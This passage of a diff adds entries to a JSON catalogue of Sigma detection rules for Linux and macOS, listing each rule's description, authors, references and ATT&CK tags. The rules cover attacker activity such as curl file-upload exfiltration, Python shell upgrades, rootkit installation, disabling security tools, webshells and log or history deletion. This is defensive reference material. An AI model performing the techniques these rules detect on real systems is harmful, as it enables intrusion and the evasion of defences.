"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning" + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/06", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + 
"filename": "proc_creation_lnx_nohup.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://en.wikipedia.org/wiki/Nohup", + "https://www.computerhope.com/unix/unohup.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." 
+ ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
+ ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" + }, + { + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_process_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery" + }, + { + "description": "Detects setting proxy configuration", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_proxy_connection.yml", + "level": 
"low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ] + }, + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery" + }, + { + "description": "Detects abuse of the cron utility to 
perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux" + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_security_software_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + 
"falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools" + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services" + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_setgid_setuid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287" + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/03", + "falsepositive": [ + "Admin changing file permissions." 
+ ], + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux" + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "meta": { + "author": "Nasreddine Bencherchali", 
+ "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux" + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion" + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + 
 "logsource.product": "linux",
+ "refs": [
+ "https://github.com/sleventyeleven/linuxprivchecker/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml"
+ ],
+ "tags": [
+ "attack.reconnaissance",
+ "attack.t1592.004"
+ ]
+ },
+ "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66",
+ "value": "Print History File Contents"
+ },
+ {
+ "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/03/14",
+ "falsepositive": [
+ "Legitimate software that uses these patterns"
+ ],
+ "filename": "proc_creation_lnx_susp_interactive_bash.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55",
+ "value": "Interactive Bash Suspicious Children"
+ },
+ {
+ "description": "Detects java process spawning suspicious children",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/03",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_susp_java_children.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.tecmint.com/different-types-of-linux-shells/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892",
+ "value": "Suspicious Java Children Processes"
+ },
+ {
+ "description": "Detects suspicious process 
command line that starts with a shell that executes something and finally gets piped into another shell",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/03/14",
+ "falsepositive": [
+ "Legitimate software that uses these patterns"
+ ],
+ "filename": "proc_creation_lnx_susp_pipe_shell.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1140"
+ ]
+ },
+ "uuid": "880973f3-9708-491c-a77b-2a35a1921158",
+ "value": "Linux Shell Pipe to Shell"
+ },
+ {
+ "description": "Detects events with patterns found in commands used for reconnaissance on linux systems",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/20",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_susp_recon_indicators.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml"
+ ],
+ "tags": [
+ "attack.reconnaissance",
+ "attack.t1592.004",
+ "attack.credential_access",
+ "attack.t1552.001"
+ ]
+ },
+ "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7",
+ "value": "Linux Recon Indicators"
+ },
+ {
+ "description": "Detects system information discovery commands",
+ "meta": {
+ "author": "Ömer Günal, oscd.community",
+ "creation_date": "2020/10/08",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_system_info_discovery.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ 
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239",
+ "value": "System Information Discovery"
+ },
+ {
+ "description": "Detects usage of system utilities to discover system network connections",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate activities"
+ ],
+ "filename": "proc_creation_lnx_system_network_connections_discovery.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1049"
+ ]
+ },
+ "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79",
+ "value": "System Network Connections Discovery - Linux"
+ },
+ {
+ "description": "Detects enumeration of local network configuration",
+ "meta": {
+ "author": "Ömer Günal and remotephone, oscd.community",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_system_network_discovery.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ 
"attack.t1016"
+ ]
+ },
+ "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa",
+ "value": "System Network Discovery - Linux"
+ },
+ {
+ "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/05",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e",
+ "value": "Triple Cross eBPF Rootkit Execve Hijack"
+ },
+ {
+ "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/05",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1014"
+ ]
+ },
+ "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f",
+ "value": "Triple Cross eBPF Rootkit Install Commands"
+ },
+ {
+ "description": "Detects suspicious sub processes of web server processes",
+ "meta": {
+ "author": "Florian Roth, 
Nasreddine Bencherchali (update)",
+ "creation_date": "2021/10/15",
+ "falsepositive": [
+ "Web applications that invoke Linux command line tools"
+ ],
+ "filename": "proc_creation_lnx_webshell_detection.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
+ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003"
+ ]
+ },
+ "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7",
+ "value": "Linux Webshell Indicators"
+ },
+ {
+ "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/23",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "file_event_macos_emond_launch_daemon.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md",
+ "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.014"
+ ]
+ },
+ "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce",
+ "value": "MacOS Emond Launch Daemon"
+ },
+ {
+ "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.",
+ "meta": {
+ "author": "Alejandro Ortuno, 
oscd.community",
+ "creation_date": "2020/10/14",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "file_event_macos_startup_items.yml",
+ "level": "low",
+ "logsource.category": "file_event",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1037.005"
+ ]
+ },
+ "uuid": "dfe8b941-4e54-4242-b674-6b613d521962",
+ "value": "Startup Items"
+ },
+ {
+ "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/21",
+ "falsepositive": [
+ "Application installers might contain scripts as part of the installation process."
+ ],
+ "filename": "proc_creation_macos_applescript.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.002"
+ ]
+ },
+ "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55",
+ "value": "MacOS Scripting Interpreter AppleScript"
+ },
+ {
+ "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate activities"
+ ],
+ "filename": "proc_creation_macos_base64_decode.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027"
+ ]
+ },
+ "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68",
+ "value": "Decode Base64 Encoded Text -MacOs"
+ },
+ {
+ "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.",
+ "meta": {
+ "author": "Igor Fits, Mikhail Larin, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate script work"
+ ],
+ "filename": "proc_creation_macos_binary_padding.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027.001"
+ ]
+ },
+ "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96",
+ "value": "Binary Padding - MacOS"
+ },
+ {
+ "description": "Detect file time attribute change to hide new or changes to existing files",
+ "meta": {
+ "author": "Igor Fits, Mikhail Larin, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_macos_change_file_time_attr.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml"
+ ],
+ 
"tags": [
+ "attack.defense_evasion",
+ "attack.t1070.006"
+ ]
+ },
+ "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0",
+ "value": "File Time Attribute Change"
+ },
+ {
+ "description": "Detects deletion of local audit logs",
+ "meta": {
+ "author": "remotephone, oscd.community",
+ "creation_date": "2020/10/11",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_clear_system_logs.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
